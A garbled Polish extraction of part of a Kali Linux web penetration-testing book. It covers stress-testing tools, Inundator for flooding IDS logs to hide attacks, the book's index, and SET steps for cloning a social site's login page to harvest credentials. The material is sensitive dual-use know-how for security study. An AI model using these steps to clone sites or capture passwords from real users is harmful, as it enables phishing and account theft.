SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 26: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

